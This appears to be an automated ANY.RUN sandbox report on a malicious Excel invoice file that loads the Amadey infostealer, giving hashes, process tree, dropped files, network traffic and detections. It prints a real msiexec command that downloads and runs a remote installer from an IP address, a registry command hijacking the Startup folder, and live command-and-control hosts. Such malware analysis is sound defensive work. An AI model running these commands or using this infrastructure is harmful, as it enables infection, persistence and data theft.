analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

B0D33EBC_Factura_FMC4752_20190424.xls

Full analysis: https://app.any.run/tasks/b8e9c32a-d43a-49f3-af95-c4c5ea622bb6
Verdict: Malicious activity
Threats:

Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks.

Analysis date: April 25, 2019, 06:55:15
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
exe-to-msi
trojan
amadey
loader
ta505
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: Microsoft Office, Last Saved By: 1, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Dec 19 10:42:12 2018, Last Saved Time/Date: Wed Apr 24 15:31:30 2019, Security: 0
MD5:

5881373811FCCA6E422385F317145916

SHA1:

9F4FCF622FE01AD21F89F81A735EA9137A7537E7

SHA256:

C45C0DD7171D9618F95323E5EF06A5E0C89F363A9C14680CB4B4AE9DB363700C

SSDEEP:

3072:+Kpb8rGYrMPelwhKmFV5xtezEsgrdgaeEQSNfzAKAn8CsENt:+Kpb8rGYrMPelwhKmFV5xtuEsgrdgaHs

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 3064)
    • Uses Microsoft Installer as loader

      • EXCEL.EXE (PID: 3064)
    • Changes the Startup folder

      • REG.exe (PID: 3860)
    • Connects to CnC server

      • cmualrc.exe (PID: 3232)
    • Downloads executable files from IP

      • msiexec.exe (PID: 2296)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 2296)
    • AMADEY was detected

      • cmualrc.exe (PID: 3232)
    • Application was dropped or rewritten from another process

      • cmualrc.exe (PID: 3232)
  • SUSPICIOUS

    • Drop ExeToMSI Application

      • msiexec.exe (PID: 2296)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 2296)
      • MSI7005.tmp (PID: 120)
    • Uses REG.EXE to modify Windows registry

      • cmualrc.exe (PID: 3232)
    • Creates files in the program directory

      • MSI7005.tmp (PID: 120)
  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 3064)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 2296)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 2296)
    • Application was dropped or rewritten from another process

      • MSI7005.tmp (PID: 120)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

Author: Microsoft Office
LastModifiedBy: 1
Software: Microsoft Excel
CreateDate: 2018:12:19 10:42:12
ModifyDate: 2019:04:24 14:31:30
Security: None
CodePage: Windows Cyrillic
Company: Microsoft Corporation
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
  • 4
  • OOOO
  • 2
  • 3
HeadingPairs:
  • Листы
  • 2
  • Макросы Excel 4.0
  • 2
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
6
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start excel.exe no specs msiexec.exe no specs msiexec.exe msi7005.tmp #AMADEY cmualrc.exe reg.exe

Process information

PID
CMD
Path
Indicators
Parent process
3064"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
2556msiexec.exe STOP=1 /i http://109.234.38.177/dom4 /q ksw='%TEMP%' C:\Windows\system32\msiexec.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2296C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
120"C:\Windows\Installer\MSI7005.tmp"C:\Windows\Installer\MSI7005.tmp
msiexec.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3232c:\programdata\f64a428dfd\cmualrc.exec:\programdata\f64a428dfd\cmualrc.exe
MSI7005.tmp
User:
admin
Integrity Level:
MEDIUM
3860REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\f64a428dfdC:\Windows\system32\REG.exe
cmualrc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
721
Read events
657
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
1
Text files
9
Unknown types
3

Dropped files

PID
Process
Filename
Type
3064EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR63AD.tmp.cvr
MD5:
SHA256:
2296msiexec.exeC:\Users\admin\AppData\Local\Temp\~DFAC9CD54231A4F8A9.TMP
MD5:
SHA256:
2296msiexec.exeC:\Windows\Installer\MSI6F28.tmp
MD5:
SHA256:
2296msiexec.exeC:\Windows\Installer\MSI7005.tmp
MD5:
SHA256:
120MSI7005.tmpC:\ProgramData\0
MD5:
SHA256:
120MSI7005.tmpC:\programdata\f64a428dfd\cmualrc.exe:Zone.Identifier
MD5:
SHA256:
2296msiexec.exeC:\Config.Msi\106e7d.rbs
MD5:
SHA256:
3232cmualrc.exeC:\ProgramData\0
MD5:
SHA256:
2296msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF611FD0D856D56538.TMP
MD5:
SHA256:
2296msiexec.exeC:\Users\admin\AppData\Local\Temp\History\History.IE5\index.datdat
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862
SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3232
cmualrc.exe
POST
178.169.222.191:80
http://gohaiendo.com/ppk/index.php
BG
malicious
2296
msiexec.exe
GET
200
109.234.38.177:80
http://109.234.38.177/dom4
RU
executable
172 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3232
cmualrc.exe
178.169.222.191:80
gohaiendo.com
Bulsatcom EAD
BG
malicious
2296
msiexec.exe
109.234.38.177:80
Webzilla B.V.
RU
suspicious

DNS requests

Domain
IP
Reputation
gohaiendo.com
  • 178.169.222.191
  • 66.181.168.248
  • 86.125.140.110
  • 193.107.99.167
  • 79.100.159.26
  • 37.75.33.242
  • 130.204.181.90
  • 89.45.19.24
  • 95.43.57.155
  • 87.126.16.141
malicious

Threats

PID
Process
Class
Message
2296
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
2296
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
3232
cmualrc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Trojan.Win32.Amadey
3232
cmualrc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Trojan.Win32.Amadey
2 ETPRO signatures available at the full report
No debug info